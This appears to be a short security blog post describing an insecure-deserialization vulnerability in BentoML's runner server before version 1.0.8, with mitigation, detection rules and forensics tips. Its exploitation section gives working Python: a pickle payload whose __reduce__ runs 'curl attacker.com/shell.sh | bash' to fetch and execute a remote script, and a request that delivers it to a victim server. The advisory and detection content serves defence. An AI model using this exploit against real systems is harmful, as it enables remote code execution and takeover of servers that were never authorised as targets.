Listen to this Post
How the CVE Works:
The vulnerability stems from BentoML’s runner server improperly validating user-supplied headers during deserialization. When a POST request is sent with args-number: 1, the server processes the payload using _deserialize_single_param(). Attackers can manipulate Payload-Container, Payload-Meta, and `Batch-Size` headers to force the server into unsafe deserialization via pickle.loads(). By crafting a malicious pickle payload (e.g., using __reduce__), arbitrary OS commands execute. The exploit works with `NdarrayContainer` or PandasDataFrameContainer, as both trigger `pickle.loads()` when `format: “default”` is set in Payload-Meta.
DailyCVE Form:
Platform: BentoML
Version: <1.0.8
Vulnerability: Insecure Deserialization
Severity: Critical
Date: 2023-XX-XX
What Undercode Say:
Exploitation:
1. Craft Pickle Payload:
import pickle, os
class Exploit:
def <strong>reduce</strong>(self):
return (os.system, ('curl attacker.com/shell.sh | bash',))
payload = pickle.dumps(Exploit())
2. Send Malicious Request:
import requests
headers = {
"args-number": "1",
"Payload-Container": "NdarrayContainer",
"Payload-Meta": '{"format": "default"}',
"Batch-Size": "-1",
}
requests.post("http://victim:8888/", headers=headers, data=payload)
Mitigation:
1. Patch: Upgrade to BentoML >=1.0.8.
- Input Validation: Reject `Content-Type: application/vnd.bentoml.pickled` unless explicitly required.
- Sandboxing: Run BentoML in isolated containers with restricted syscall access.
- Network Controls: Restrict runner-server ports (e.g.,
--port 8888) to trusted IPs.
Detection:
- Log Analysis:
grep -r "Payload-Container" /var/log/bentoml/runner.log
- IDS Rule (Suricata):
alert http any any -> $HOME_NET 8888 (msg:"BentoML Deserialization Exploit"; content:"args-number: 1"; content:"Payload-Container"; content:"format: default"; sid:1000001;)
Post-Exploit Forensics:
- Check Runner Logs:
journalctl -u bentoml-runner --no-pager | grep "async_run"
- Inspect Active Connections:
ss -tulnp | grep 8888
References:
References:
Reported By: https://github.com/advisories/GHSA-7v4r-c989-xh26
Extra Source Hub:
Undercode

